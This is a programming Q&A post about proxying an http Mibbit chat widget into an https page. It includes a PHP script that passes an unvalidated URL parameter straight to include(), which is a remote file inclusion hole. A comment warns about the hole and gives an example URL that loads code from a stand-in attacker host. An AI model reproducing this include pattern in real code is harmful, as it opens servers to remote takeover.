# PHP Proxy to Download Loaded Page

Tags: php, http, https, proxy, wrapper

What I'm trying to do is embed a mibbit chat (http) into my https page.

```
http://widget.mibbit.com/?settings=3b1b26ad6736d7fadea79c6c6d254eec&server=irc.Mibbit.Net%3A%2B6697&channel=%23ChannelName
```

That's an example URL for the chat. It's embedded like so:

```
<iframe width="550" height="350" scrolling="no" src="http://widget.mibbit.com/?settings=3b1b26ad6736d7fadea79c6c6d254eec&server=irc.Mibbit.Net%3A%2B6697&channel=%23ChannelName"></iframe>
```

I have a page called proxy.php:

```
<?php
if (isset($_GET['page'])) {
    $page = $_GET['page'];
    include($page);
}
else {
    echo 'No Parameters Given';
}
?>
```

Of course this doesn't work as it just returns the client-side stuff. How can I make that page act as a proxy for the content so I can just do:

```
/proxy.php?page=http://widget.mibbit.com/?settings=3b1b26ad6736d7fadea79c6c6d254eec&server=irc.Mibbit.Net%3A%2B6697&channel=%23ChannelName
```

Comment: that code is INCREDIBLY DANGEROUS AND INSECURE. consider `http://yoursite.com/script.php?get=http://nastyhackers.ru/total_remote_takeover.php`. in other words, congrats - you've opened your server to a complete and utter remote compromise.

Comment: I know, I just included that for testing. I was going to add security if it worked. @MarcB